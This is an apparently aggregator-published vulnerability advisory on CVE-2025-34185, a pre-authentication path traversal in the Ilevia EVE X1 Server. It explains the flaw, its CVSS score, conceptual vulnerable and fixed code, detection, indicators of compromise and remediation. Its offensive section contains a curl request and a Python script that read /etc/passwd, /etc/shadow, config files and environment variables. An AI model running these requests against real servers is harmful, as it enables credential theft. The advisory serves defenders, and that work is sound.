CVE-2025-34185
Executive Summary
CVE-2025-34185 is a critical pre-authentication file disclosure vulnerability affecting the Ilevia EVE X1 Server, versions up to and including 4.7.18.0.eden. The vulnerability resides in the db_log POST parameter, allowing a remote, unauthenticated attacker to read arbitrary files from the server's filesystem. This can lead to the exposure of sensitive system information, configuration files, and credentials, potentially enabling further lateral movement or privilege escalation within the network. No patch is currently available, making this a high-priority risk for any organization using the affected software.
This record — and 170,000+ others — are available via the ValtersIT API. One endpoint replaces five: NVD + GitHub CVE + CISA KEV + EPSS + Nuclei + Exploit-DB, unified.

Supply Chain & Package Security
This vulnerability is not related to NPM, PyPI, Go, or Ruby packages. It is a proprietary software component (Ilevia EVE X1 Server) and should be treated as a direct supply chain risk from the vendor.
CVSS Breakdown & Threat Level
CVSS Score: 7.5 (High) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- Attack Vector (AV): Network (N) - Exploitable remotely.
- Attack Complexity (AC): Low (L) - No special conditions required.
- Privileges Required (PR): None (N) - No authentication needed.
- User Interaction (UI): None (N) - No user action required.
- Scope (S): Unchanged (U) - The vulnerable component is the only one affected.
- Confidentiality (C): High (H) - Complete disclosure of filesystem contents.
- Integrity (I): None (N) - No file modification possible.
- Availability (A): None (N) - No denial of service.
Threat Level: Critical. The combination of remote exploitability, no authentication, and high confidentiality impact makes this a severe threat. An attacker can immediately harvest credentials and system secrets.
Deep Dive & Mechanics
The vulnerability is a classic Path Traversal (CWE-22) flaw. The Ilevia EVE X1 Server exposes a POST endpoint that accepts a db_log parameter. The server fails to properly sanitize or validate the user-supplied input, allowing an attacker to inject directory traversal sequences (e.g., ../) to escape the intended log directory.
Root Cause: The application likely constructs a file path by concatenating a base directory with the user-supplied db_log value without checking for ../ or absolute path references. For example:
file_path = "/var/log/ilevia/" + user_input;
If user_input is ../../etc/passwd, the resulting path becomes /var/log/ilevia/../../etc/passwd, which resolves to /etc/passwd.
Attack Flow:
- Attacker identifies the vulnerable endpoint (e.g.,
/api/logsor/logviewer). - Attacker sends a POST request with
db_log=../../etc/passwd. - Server reads the file and returns its contents in the HTTP response.
- Attacker iterates through common files (e.g.,
/etc/shadow, configuration files, database credentials) to escalate access.
Vulnerable vs. Patched Code
Vulnerable Code (Conceptual):
@app.route('/api/logs', methods=['POST'])
def get_log():
log_file = request.form.get('db_log')
# VULNERABLE: No path sanitization
file_path = os.path.join('/var/log/ilevia/', log_file)
with open(file_path, 'r') as f:
return f.read()
Patched Code (Conceptual):
import os
@app.route('/api/logs', methods=['POST'])
def get_log():
log_file = request.form.get('db_log')
# PATCH: Validate and sanitize path
safe_dir = '/var/log/ilevia/'
# Resolve the absolute path and ensure it starts with the safe directory
full_path = os.path.realpath(os.path.join(safe_dir, log_file))
if not full_path.startswith(os.path.realpath(safe_dir)):
return "Invalid path", 403
with open(full_path, 'r') as f:
return f.read()
Exploitation & Lab Setup
Red Team (Offensive)
Lab Setup:
- Deploy a vulnerable Ilevia EVE X1 Server (version 4.7.18.0.eden) in a controlled environment.
- Ensure the server is accessible on the network (e.g.,
http://192.168.1.100:8080).
Exploitation Steps:
- Identify the vulnerable endpoint: Use a web fuzzer or manual inspection to find the POST endpoint accepting
db_log. Common paths include/api/logs,/logviewer, or/admin/logs. - Craft the exploit request:
curl -X POST http://192.168.1.100:8080/api/logs \ -d "db_log=../../etc/passwd" - Extract sensitive files:
/etc/passwd- User accounts/etc/shadow- Password hashes (if readable)/etc/ilevia/config.ini- Application credentials/proc/self/environ- Environment variables (may contain secrets)
- Automate with a script:
import requests target = "http://192.168.1.100:8080/api/logs" files_to_read = [ "../../etc/passwd", "../../etc/shadow", "../../etc/ilevia/config.ini", "../../proc/self/environ" ] for file in files_to_read: r = requests.post(target, data={"db_log": file}) print(f"[+] {file}:\n{r.text}\n")
Blue Team (Defensive)
Detection & Response:
- Monitor for path traversal patterns: Look for
../or..\in POST parameters, especiallydb_log. - Web Application Firewall (WAF) Rules: Block requests containing
../in thedb_logparameter. - Log Analysis: Check server logs for unusual file access patterns (e.g., attempts to read
/etc/passwd). - Network Segmentation: Isolate the Ilevia EVE X1 Server from critical systems to limit lateral movement.
- Honeypot Files: Place fake credential files (e.g.,
/etc/ilevia/fake_creds.txt) to detect scanning.
Indicators of Compromise (IOCs)
- Network IOCs:
- POST requests to
/api/logsor similar endpoints withdb_logparameter containing../. - Outbound connections from the server to unknown IPs after exploitation.
- POST requests to
- File System IOCs:
- Unexpected access to
/etc/passwd,/etc/shadow, or application config files. - Presence of new files in
/tmp/or other writable directories (e.g., webshells).
- Unexpected access to
- Process IOCs:
- Unusual processes spawned by the Ilevia service (e.g.,
curl,wget,nc).
- Unusual processes spawned by the Ilevia service (e.g.,
- Log IOCs:
- Repeated 200 responses for non-existent log files.
- Error logs showing path traversal attempts.

Remediation & Mitigation
Immediate Actions:
- Disable the vulnerable endpoint if not required for business operations.
- Apply a virtual patch using a WAF to block
../in thedb_logparameter. - Restrict network access to the Ilevia EVE X1 Server using firewall rules (allow only trusted IPs).
Long-Term Fix:
- Vendor Patch: Contact Ilevia for an official patch. If unavailable, consider migrating to an alternative solution.
- Code Fix: If source code is available, implement proper input validation and path sanitization as shown in the patched code example.
- Upgrade: Monitor for new versions and upgrade as soon as a patch is released.
Compromise Assessment:
- Check server logs for any successful exploitation attempts.
- Review all files that may have been accessed (e.g.,
/etc/passwd, config files). - Rotate all credentials stored on the affected server.
